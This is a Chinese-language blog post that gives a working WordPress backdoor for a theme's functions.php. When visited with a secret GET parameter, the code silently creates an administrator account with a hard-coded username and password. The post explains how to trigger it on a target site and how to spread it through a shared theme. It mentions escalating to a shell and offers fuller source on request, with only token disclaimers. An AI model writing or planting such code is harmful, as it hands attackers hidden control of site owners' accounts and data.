一段程式碼，讓你的部落格從此毫無毫安全感

以前大家是不是總是聽說過程式後門啦，網站後門啦之類的。

其實只要在你的主題裡新增一段程式碼，你的部落格賬號，就從此呵呵了。想想太邪惡了，首先我先宣告下，我分享的絕無，不信你們自己看，我沒那麼邪惡的。

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'ihuan', 'me' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

這麼一段程式碼加入主題的 functions.php 中，對方的網站就無處藏身了。

然後，你再加點別的，提示下對方正在用你的主題，在 functions.php 裡或其他地方再加個連結觸發就好了。然後，你只需要……就可以呵呵呵了！太邪惡了……

但是小幻不建議這麼幹，請自覺使用！

使用方法：開啟 http://目標.com/?backdoor=ihuan 如果在二級目錄就加個二級。

然後，你就可以使用你的密碼來登陸他的後臺了，正常登陸即可，管理員許可權，也就是說，你甚至可以 shell 。具體不多說，自己百度。沒辦法，WP 太強大了！！！超簡單拿權。

我這裡預設設定的賬號密碼是 賬號：ihuan 密碼：me

就這樣了，別做壞事！！！！！

如果需要詳細的各種功能原始碼 （觸發、記錄等），請聯絡我，*** 完了完了，我又要做壞事

但是刪資料庫、放黑頁不是我們這些 「三好學生」 該乾的。請收好您的好奇心！